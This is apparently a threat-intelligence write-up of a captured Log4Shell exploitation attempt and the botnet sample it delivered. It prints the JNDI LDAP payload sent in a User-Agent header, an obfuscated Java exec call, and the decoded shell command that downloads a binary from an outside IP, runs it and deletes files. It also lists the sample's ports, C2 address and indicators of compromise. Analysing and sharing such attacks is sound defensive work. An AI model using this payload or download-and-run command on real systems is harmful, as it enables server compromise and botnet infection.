Attack info:
‘User-Agent’, ‘${jndi:ldap://179.43.175.101:1389/o=tomcat}’
Attacker IP: 107.189.29.181
The payload is Base64 encoded:
The decoded string is:
The payload is a JavaScript code which is executed in Java using the ScripteEngineManager. The shell command is derived using the String.fromCharCode function:
java.lang.Runtime.getRuntime().exec(String.fromCharCode(99,100,32,47,116,109,112,59,32,119,103,101,116,32,49,57,56,46,57,56,46,54,48,46,54,55,47,98,105,110,115,47,120,56,54,59,32,99,104,109,111,100,32,55,55,55,32,42,59,32,46,47,120,56,54,32,108,111,103,52,106,59,32,114,109,32,45,114,102,32,42))…
The derived string is: cd /tmp; wget 198.98.60.67/bins/x86; chmod 777 *; ./x86 log4j; rm -rf *
The downloaded file is a statically linked x86 ELF botnet sample:
Scans TCP ports: 2323, 23, 37215, 8080
C2: 209.141.61.220:5555
Brief sandbox analysis: https://elfdigest.com/brief/e9744244461056c64fc390591729c035f3a375bc8ecfa1a0c111defa055c1273
IOCs:
ldap://179.43.175.101:1389/o=tomcat
198.98.60.67/bins/x86
e9744244461056c64fc390591729c035f3a375bc8ecfa1a0c111defa055c1273